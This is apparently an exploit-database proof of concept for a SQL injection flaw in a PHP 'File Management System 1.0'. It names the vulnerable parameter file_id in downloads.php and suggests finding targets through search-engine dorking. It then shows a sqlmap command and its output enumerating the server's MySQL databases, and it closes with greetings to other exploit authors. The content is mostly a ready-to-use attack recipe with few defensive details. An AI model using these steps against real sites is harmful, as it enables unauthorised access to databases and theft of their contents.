============================================================================================================================================= | # Title : File Management System 1.0 Sql Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] USe Payload : /downloads.php?file_id=2 <==== inject here [+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/filemanagement/Private_Dashboard/downloads.php?file_id=2 --dbs --- [00:07:45] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.58, PHP 8.0.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [00:07:45] [INFO] fetching database names [00:07:45] [INFO] fetching number of databases [00:07:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [00:07:45] [INFO] retrieved: 5 [00:07:45] [INFO] retrieved: information_schema [00:07:54] [INFO] retrieved: file_management [00:08:00] [INFO] retrieved: mysql [00:08:02] [INFO] retrieved: performance_schema [00:08:10] [INFO] retrieved: phpmyadmin available databases [5]: [*] file_management [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================